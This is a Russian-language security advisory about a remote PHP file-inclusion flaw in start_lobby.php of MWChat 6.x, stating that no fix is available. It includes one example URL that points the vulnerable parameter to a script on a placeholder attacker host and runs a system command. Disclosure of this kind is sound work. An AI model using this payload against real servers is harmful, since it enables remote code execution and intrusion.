PHP-инклюдинг в сценарии start_lobby.php в MWChat

Дата публикации:
06.06.2005
Всего просмотров:
7805
Опасность:
Высокая
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Уязвимые версии: MWChat 6.x

Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольные команды на целевой системе.

Уязвимость существует из-за недостаточной обработки входных данных в параметре '$CONFIG[MWCHAT_Libs]' сценария 'start_lobby.php'. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный PHP сценарий на целевой системе с привилегиями web сервера. Пример:

http://[target]/mwchat/libs/start_lobby.php?CONFIG
[MWCHAT_Libs]=http://[attacker]/cmd.txt?&cmd=u name%20-a

URL производителя: www.appindex.net/products/detail/?product=mwchat

Решение: Способов устранения уязвимости не существует в настоящее время.

Ссылки: MW CHAT Version 6.xx Remote File Include

или введите имя

CAPTCHA